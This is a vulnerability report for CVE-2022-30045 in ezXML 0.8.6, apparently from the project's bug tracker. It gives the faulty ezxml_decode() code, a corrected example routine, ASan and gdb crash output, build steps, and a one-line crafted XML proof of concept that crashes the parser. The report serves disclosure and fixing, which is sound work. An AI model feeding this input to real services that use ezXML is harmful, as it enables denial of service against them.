CVE-2022-30045: ezXML / Bugs / #29 Out-of-bounds read in ezxml_decode() leading to heap corruption
An issue was discovered in libezxml.a in ezXML 0.8.6. The function ezxml_decode() performs incorrect memory handling while parsing crafted XML files, leading to a heap out-of-bounds read.
Affected version: 0.8.6 (with the fixes for previously reported CVEs applied).
Out-of-bounds read in strchr of ezxml_decode() [ezxml.c:198:25]
```c
if (ent[b++]) { // found a match
    if ((c = strlen(ent[b])) - 1 > (e = strchr(s, ';')) - s) {
        l = (d = (s - r)) + c + strlen(e); // new length
        r = (r == m) ? strcpy(malloc(l), r) : realloc(r, l);
        e = strchr((s = r + d), ';'); // out-of-bounds read
    }
```
Impact: a crafted XML file crashes the parser (denial of service).
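For comparison, the following is an added example (not ezXML code, and not a patch for this CVE) that performs the same in-place entity expansion as the excerpt above, with the checks the excerpt lacks: the `strchr(s, ';')` result is tested for NULL before it is used in arithmetic, every length is derived from measured string lengths rather than pointer differences, the working position survives `realloc()` as an offset, and replacement text is not re-scanned. The entity table layout (NULL-terminated name/replacement pairs, names ending in `;`) is assumed to mirror ezXML's built-in table; `expand_entities`, `expands_to`, `builtin_ent` and the constructed `custom_ent` table are names introduced here.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/*
 * Added example (not ezXML code and not a fix for CVE-2022-30045).
 * Expands "&name;" references in a heap string with the same
 * grow-then-fix-up structure as the ezxml_decode() excerpt, but:
 *   - every length comes from measured string lengths, never from a
 *     pointer difference involving an unchecked strchr() result;
 *   - the ';' lookup is checked for NULL before it is used;
 *   - after realloc() the working pointer is rebuilt from an offset;
 *   - replacement text is not re-scanned, so "&amp;lt;" yields "&lt;".
 *
 * ent is a NULL-terminated array of name/replacement pairs where each
 * name already ends in ';' (assumed to mirror ezXML's built-in table).
 */
static const char *const builtin_ent[] = {
    "lt;", "<", "gt;", ">", "quot;", "\"", "apos;", "'", "amp;", "&", NULL
};

/* Constructed sample of a user-defined entity whose replacement is longer
 * than the reference, which forces the buffer-growth path. */
static const char *const custom_ent[] = { "big;", "0123456789", NULL };

/* Returns a newly allocated expanded copy of in (caller frees), or NULL on
 * allocation failure. Unknown or unterminated references are left as-is. */
char *expand_entities(const char *in, const char *const *ent)
{
    size_t len = strlen(in);          /* current strlen(r), tracked explicitly */
    size_t cap = len + 1;             /* bytes allocated for r */
    char *r = malloc(cap);
    if (!r) return NULL;
    memcpy(r, in, cap);

    for (size_t pos = 0; pos < len; ) {
        if (r[pos] != '&') { pos++; continue; }

        const char *semi = strchr(r + pos, ';');
        if (!semi) break;                            /* no terminator: stop */
        size_t ref_len = (size_t)(semi - (r + pos)) + 1;   /* "&name;" */

        size_t b;
        for (b = 0; ent[b]; b += 2) {
            size_t nlen = strlen(ent[b]);
            if (nlen + 1 == ref_len && memcmp(r + pos + 1, ent[b], nlen) == 0)
                break;
        }
        if (!ent[b]) { pos++; continue; }            /* not a known entity */

        const char *rep = ent[b + 1];
        size_t rep_len = strlen(rep);
        size_t new_len = len - ref_len + rep_len;

        if (new_len + 1 > cap) {                     /* grow the buffer */
            char *nr = realloc(r, new_len + 1);
            if (!nr) { free(r); return NULL; }
            r = nr;                                  /* r moved; pos is still valid */
            cap = new_len + 1;
        }
        /* shift the tail (including its NUL) into place, then drop in rep */
        memmove(r + pos + rep_len, r + pos + ref_len, len - pos - ref_len + 1);
        memcpy(r + pos, rep, rep_len);
        len = new_len;
        pos += rep_len;                              /* skip replacement text */
    }
    return r;
}

/* Helper for checks: expand in with ent and compare against want. */
int expands_to(const char *in, const char *const *ent, const char *want)
{
    char *out = expand_entities(in, ent);
    int ok = out != NULL && strcmp(out, want) == 0;
    free(out);
    return ok;
}

int main(void)
{
    const char *inputs[] = { "a &lt; b &amp; c", "x&big;y", "&amp;lt;",
                             "a &lt", "&foo; &gt;" };
    for (size_t i = 0; i < sizeof inputs / sizeof *inputs; i++) {
        char *out = expand_entities(inputs[i], i == 1 ? custom_ent : builtin_ent);
        printf("%-18s -> %s\n", inputs[i], out ? out : "(alloc failed)");
        free(out);
    }
    return 0;
}
```

The `x&big;y` input exercises the growth path that the ezxml.c excerpt takes at line 197: the replacement is longer than the reference, so the buffer is reallocated and the position is re-derived from `pos` before the tail is moved. Not re-scanning replacement text is the XML-conformant behaviour and also rules out unbounded recursive expansion through a user-defined entity whose value references another entity.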
Crash Info
```
$ ./ezxmltest …/poc/ezxml-poc.xml
=================================================================
==2357578==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000021 at pc 0x000000430ff4 bp 0x7ffc963072b0 sp 0x7ffc96306a70
READ of size 7 at 0x603000000021 thread T0
    #0 0x430ff3 in strchr (/home/migraine/下载/ezxml/ezxmltest+0x430ff3)
    #1 0x4cc6e7 in ezxml_decode /home/migraine/下载/ezxml/ezxml.c:198:25
    #2 0x4cdb26 in ezxml_char_content /home/migraine/下载/ezxml/ezxml.c:242:22
    #3 0x4d607b in ezxml_parse_str /home/migraine/下载/ezxml/ezxml.c:592:21
    #4 0x4d7d5d in ezxml_parse_fd /home/migraine/下载/ezxml/ezxml.c:642:30
    #5 0x4e0192 in ezxml_parse_file /home/migraine/下载/ezxml/ezxml.c:660:19
    #6 0x4e0192 in main /home/migraine/下载/ezxml/ezxml.c:1009:11
    #7 0x7fde60920564 in __libc_start_main csu/…/csu/libc-start.c:332:16
    #8 0x41c33d in _start (/home/migraine/下载/ezxml/ezxmltest+0x41c33d)

0x603000000021 is located 0 bytes to the right of 17-byte region [0x603000000010,0x603000000021)
allocated by thread T0 here:
    #0 0x49759d in malloc (/home/migraine/下载/ezxml/ezxmltest+0x49759d)
    #1 0x4cc683 in ezxml_decode /home/migraine/下载/ezxml/ezxml.c:197:43
    #2 0x4cdb26 in ezxml_char_content /home/migraine/下载/ezxml/ezxml.c:242:22
    #3 0x4d7d5d in ezxml_parse_fd /home/migraine/下载/ezxml/ezxml.c:642:30
    #4 0x4e0192 in ezxml_parse_file /home/migraine/下载/ezxml/ezxml.c:660:19
    #5 0x4e0192 in main /home/migraine/下载/ezxml/ezxml.c:1009:11

SUMMARY: AddressSanitizer: heap-buffer-overflow (/home/migraine/下载/ezxml/ezxmltest+0x430ff3) in strchr
Shadow bytes around the buggy address:
  0x0c067fff7fb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fc0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fd0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7fe0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c067fff7ff0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c067fff8000: fa fa 00 00[01]fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8010: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8020: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8030: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8040: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c067fff8050: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
  Shadow gap:              cc
==2357578==ABORTING
```
The crash does not depend on ASAN: a normal build segfaults on the same input.
```
$ gdb -q ./ezxmltest
(gdb) r …/ezxml-poc.xml
Starting program: /home/migraine/下载/poc/ezxml/ezxmltest …/ezxml-poc.xml

Program received signal SIGSEGV, Segmentation fault.
```
How to Crash
Download ezxml from https://sourceforge.net/p/ezxml, then build it either with ASAN (via afl-clang) or as a normal build, and run the test binary on the PoC file:

```sh
cd ezxml
AFL_USE_ASAN=1 make test CC=afl-clang CXX=afl-clang++   # compile with ASAN
# or
make test                                              # compile normally
./ezxmltest ezxml-poc.xml
```
POC
ezxml-poc.xml:

```
<e>�<</e>>>
```